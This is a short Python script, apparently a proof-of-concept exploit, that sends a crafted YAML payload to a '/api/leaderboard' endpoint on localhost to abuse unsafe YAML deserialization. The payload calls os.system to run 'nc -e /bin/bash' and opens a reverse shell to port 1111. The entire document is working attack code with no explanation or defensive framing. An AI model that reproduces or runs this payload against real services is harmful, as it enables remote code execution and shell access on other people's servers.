import requests

malicious_yaml = """
!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
"""
url = "http://127.0.0.1:8080/api/leaderboard"
headers = {
    "Content-Type": "text/yaml"
}
response = requests.post(url, headers=headers, data=malicious_yaml)
print(response.text)